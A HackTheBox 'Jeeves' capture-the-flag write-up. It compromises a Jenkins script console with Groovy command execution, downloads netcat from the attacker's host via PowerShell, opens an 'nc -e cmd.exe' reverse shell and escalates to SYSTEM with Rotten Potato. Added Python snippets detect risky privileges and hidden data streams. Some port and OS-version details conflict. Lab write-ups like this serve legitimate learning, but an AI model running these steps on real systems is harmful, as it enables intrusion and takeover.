
[HackTheBox] Jeeves

I started off with a very quick nmap scan on the target machine.

nmap -sS -sV 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.38s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

I noticed there was an HTTP server on both port 80 and port 50000. There was nothing vulnerable (at least that I know of) on port 80, BUT after googling Jetty 9.4.z-SNAPSHOT I noticed there were a handful of vulnerabilities available, so I set this as my starting point.

The default page on port 50000 gave an error, and there was nothing I could access from there, so I decided to run DirBuster.

After a quick DirBuster scan, it found a directory called /askjeeves/ which was accessible and led to a Jenkins portal.

After snooping around a bit, I managed to find the Jenkins Script Console, which runs Groovy scripts on the server.

Visiting the page gave me a nice area to run code (and even had examples!)

After searching around a bit on the Jenkins wiki regarding their script console, I came across the following line:

It can even read files in which the Jenkins master has access to on the host (like /etc/passwd)

Because of this, I knew I was close to reaching the first user flag. After doing a bit of googling, I found a few lines of code I could leverage within the console.

This is the main code we will be using to exploit the machine.

def command = "whoami"
def proc = command.execute()
proc.waitForOrKill(1000)
println "Result: ${proc.in.text}"

==

Result: jeeves\kohsuke

A quick explanation of each line:

  1. A string variable holding our command.
  2. Execute the command as a new process.
  3. Wait for the process to finish, or kill it after 1000 milliseconds.
  4. Print the output from the command (if any was generated).

Using this, I tried to start off by listing all the contents of the current directory:

def command = "dir"
==
Result: java.io.IOException: CreateProcess error=2, The system cannot find the file specified

This was interesting because I could run “whoami” just fine but I could not run “dir” (whoami is a standalone executable, while dir is a cmd.exe built-in). This led me to try whether I could run cmd.exe and/or powershell.exe. I found out that PowerShell DOES exist, but it was glitchy and would hang for some reason (I never found out why). I did find ways around the “glitchiness” to execute PowerShell commands, and we will see later on how that helps.

def command = "cmd"
--
Result: Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
    
C:\Users\Administrator\.jenkins>

Nice! We can run commands inside of CMD. One thing to note here is that this isn’t a persistent shell (it’s just the result text from running the cmd command!).

Anyways, this was more than enough to let me navigate to the user directory and obtain the user flag (user.txt).

def command = "cmd /k cd C:\\Users\\kohsuke\\Desktop & more user.txt"
==
Result: e3--------------------------66a

Obviously, trying to get root privileges by constantly sending one-off commands was not feasible, and therefore I needed a simpler way to navigate around the system. I grabbed NC for Windows from the following link: https://joncraton.org/blog/46/netcat-for-windows/. Since the box can’t connect to the outside internet, I hosted a server on my local computer using Python’s SimpleHTTPServer.

python -m SimpleHTTPServer 8989
Serving HTTP on 0.0.0.0 port 8989 ...

Now I needed a way to transfer the file from my local computer to the box.
Command Prompt (the Windows 7 version on the box at the time of this article) does not have a built-in way for us to download a file, BUT PowerShell does have a few methods to download files.

def command = "cmd.exe /k cd C:\\Users\\kohsuke\\Music && PowerShell.exe -Command Invoke-WebRequest -OutFile nc.exe http://10.10.15.24:9000/nc.exe"
def proc = command.execute()
// No waitForOrKill here: the download must be allowed to finish
println "Result: ${proc.in.text}"

There are a couple of things to take away from the script above. First, notice that the “waitForOrKill” call has been removed. Depending on the speed of your connection, it is possible that the process would be killed before the file transfer is complete. You could also have increased the value from 1000 to something higher, but for simplicity’s sake I removed it.

Anyways, I thought I would quickly explain the first line.

  1. Create cmd.exe.
    /k tells cmd to run the following commands and then return to the command prompt.
    /c option can also be used which tells the command prompt to terminate after the commands have run.
    (For the purpose of this box, it does not matter which one we use).
  2. Navigate to C:\Users\kohsuke\Music (I went to a random folder to hide the NetCat file to let others figure this part out themselves instead of having NetCat provided to them the easy way!)
  3. To run multiple commands, I used an && after each command. A single ampersand (&) is used to separate multiple commands on one command line. A double ampersand (&&) is used to run commands ONLY if the command preceding it was successful. Basically, I wanted to start the next line only if I was inside of my selected folder.
  4. PowerShell.exe launches PowerShell via CMD. -Command means run the following command. Invoke-WebRequest downloads content from a web server. -OutFile is the file we will be creating, in my case “nc.exe”. “http://10.10.15.24:9000/nc.exe” is the address assigned by HackTheBox to my Kali VM, on port 9000 where my SimpleHTTPServer is hosting the NetCat file.

I can observe the download progress by looking at the terminal where I created my server.

10.10.15.24 - - [18/May/2018 02:49:32] "GET / HTTP/1.1" 200 -
10.10.10.63 - - [18/May/2018 02:58:07] "GET /nc.exe HTTP/1.1" 200 -

I can also observe that the file has been downloaded by running the dir command from the command prompt.

def command = "cmd.exe /k cd C:\\Users\\kohsuke\\Music & dir"
--
Result:  Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\kohsuke\Music

05/17/2018  05:58 PM    <DIR>          .
05/17/2018  05:58 PM    <DIR>          ..
05/17/2018  05:58 PM            61,440 nc.exe
               1 File(s)         61,440 bytes
               2 Dir(s)   7,191,183,360 bytes free

The only thing left is to connect to the terminal on my Kali VM.

As per usual, listen on a selected port using:

nc -nvlp 8989

On the target computer, I ran the following line to create a reverse-shell with a command prompt:

def command = "cmd.exe /k cd C:\\Users\\kohsuke\\Music & nc.exe 10.10.15.24 8989 -e cmd.exe"

Note: I tried to return a shell with PowerShell but it doesn’t work (not sure if it was intended or I just have bad connection).

After running the command above, I can see a connection to the shell on my Kali VM.

root@kali:~/Desktop/HackTheBox/windows# nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.15.24] from (UNKNOWN) [10.10.10.63] 49706
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\kohsuke\Music>

The first thing I wanted to do was enumerate everything I could find about our system and current user.

C:\Users\kohsuke\Music>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
...

As you can see above, I have access to a privilege that would allow me to impersonate a client. There is a very famous exploit that works for this known as “Rotten Potato.”
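When auditing a service account from the defender's side, the same `whoami /priv` output is what you would check for the privileges that make this escalation possible. The following is an added example (not part of the original writeup) that parses that output and flags enabled high-risk privileges; the sample text is constructed to match the format shown above, with one extra disabled row added for contrast.

```python
# Privileges that commonly enable local privilege escalation when held by a
# service account. SeImpersonatePrivilege is the one abused by Rotten Potato.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}

# Constructed sample in the exact column layout `whoami /priv` prints.
SAMPLE_WHOAMI_PRIV = "\n".join([
    "",
    "PRIVILEGES INFORMATION",
    "----------------------",
    "",
    f"{'Privilege Name':<29} {'Description':<41} {'State':<8}",
    "=" * 29 + " " + "=" * 41 + " " + "=" * 8,
    f"{'SeImpersonatePrivilege':<29} {'Impersonate a client after authentication':<41} Enabled",
    f"{'SeShutdownPrivilege':<29} {'Shut down the system':<41} Disabled",
    f"{'SeChangeNotifyPrivilege':<29} {'Bypass traverse checking':<41} Enabled",
])


def parse_whoami_priv(output: str) -> dict:
    """Parse `whoami /priv` text into {privilege_name: state}."""
    privs = {}
    lines = output.splitlines()
    for i, line in enumerate(lines):
        # The '=====' ruler line tells us the fixed column widths.
        if line.startswith("="):
            name_w, desc_w = [len(col) for col in line.split()][:2]
            state_start = name_w + 1 + desc_w + 1
            for row in lines[i + 1:]:
                name = row[:name_w].strip()
                if name.startswith("Se"):
                    privs[name] = row[state_start:].strip()
            break
    return privs


def flag_risky_privileges(output: str) -> list:
    """Return the enabled privileges that warrant a closer look, sorted."""
    privs = parse_whoami_priv(output)
    return sorted(p for p, state in privs.items()
                  if p in HIGH_RISK_PRIVILEGES and state == "Enabled")
```

Run against a real dump, a non-empty result means the account should be reviewed for whether it really needs the privilege (many service accounts do not).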

There are multiple ways to run this exploit but the simplest one is to run it from a Meterpreter (I was also being lazy but since we already uploaded netcat to the target I decided to just go with it. Usually, I try not to use Metasploit at all).

Anyways, I pretty much just followed everything from the article:

meterpreter > upload /root/Desktop/HackTheBox/windows/potato.exe
[*] uploading  : /root/Desktop/HackTheBox/windows/potato.exe -> potato.exe
[*] Uploaded 664.00 KiB of 664.00 KiB (100.0%): /root/Desktop/HackTheBox/windows/potato.exe -> potato.exe
[*] uploaded   : /root/Desktop/HackTheBox/windows/potato.exe -> potato.exe
meterpreter > use incognito
Loading extension incognito...Success.

Initially, when I list the tokens, you can see that there are no impersonation tokens available.

meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
No tokens available

However, when I run Rotten Potato, a SYSTEM-level (administrator) impersonation token becomes available.

meterpreter > execute -Hc -f ./potato.exe
Process 3932 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

Now all we need to do is impersonate the token to get administrator-level access.

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

After this, I successfully navigated to the Administrator’s Desktop folder but came across another dead end.

meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  797   fil   2017-11-09 01:05:18 +1100  Windows 10 Update Assistant.lnk
100666/rw-rw-rw-  282   fil   2017-11-04 13:03:17 +1100  desktop.ini
100444/r--r--r--  36    fil   2017-12-24 18:51:10 +1100  hm.txt

meterpreter > cat hm.txt
The flag is elsewhere.  Look deeper.

The flag wasn’t there. I upgraded my session to a shell and decided to have a look around.
I did get stuck here for quite a while, but after googling around a bit I came across the following article: How to Hide Data in a Secret Text File Compartment. After researching a bit, I came across the /R flag for the dir command, which displays a file’s NTFS alternate data streams and showed me the hidden root file!

C:\Users\Administrator\Desktop>dir /R
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,135,608,832 bytes free

The only thing left was to open the root.txt file and obtain the flag!

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
af----------------------------30
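Alternate data streams are a classic place to hide data, and a defender triaging a host will want to pick them out of a `dir /R` listing rather than read it by eye. The following is an added example (not part of the original writeup) that parses such output and reports every stream row, optionally ignoring the Zone.Identifier stream that Windows writes to downloaded files; the sample listing is constructed from the output shown above plus one constructed Zone.Identifier row.

```python
import re

# A stream row printed by `dir /R` has no date, just a size and
# "<file>:<stream>:$DATA". The file name may itself contain spaces.
ADS_ROW = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\]+):\$DATA\s*$")

# Written by browsers/Explorer to mark downloaded files; noisy but expected.
COMMON_BENIGN_STREAMS = {"Zone.Identifier"}

# Constructed sample: the listing from the box plus one benign stream row.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
                                    26 Windows 10 Update Assistant.lnk:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)   7,135,608,832 bytes free
"""


def find_alternate_streams(dir_output: str, ignore_benign: bool = True) -> list:
    """Return (file_name, stream_name, size_bytes) for each ADS row found."""
    found = []
    for line in dir_output.splitlines():
        m = ADS_ROW.match(line)
        if not m:
            continue  # ordinary file, directory or summary row
        size = int(m.group(1).replace(",", ""))
        file_name, stream = m.group(2), m.group(3)
        if ignore_benign and stream in COMMON_BENIGN_STREAMS:
            continue
        found.append((file_name, stream, size))
    return found


if __name__ == "__main__":
    for file_name, stream, size in find_alternate_streams(SAMPLE_DIR_R):
        print(f"{file_name} hides stream '{stream}' ({size} bytes)")
```

On a live system the same check is one line of PowerShell (`Get-Item -Path * -Stream *`), but parsing saved `dir /R` output lets you review listings collected from a host you no longer have access to.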

Overall, it was a pretty fun box. I’ve primarily worked on Linux boxes so this was a good opportunity to learn many things about the Windows system 🙂
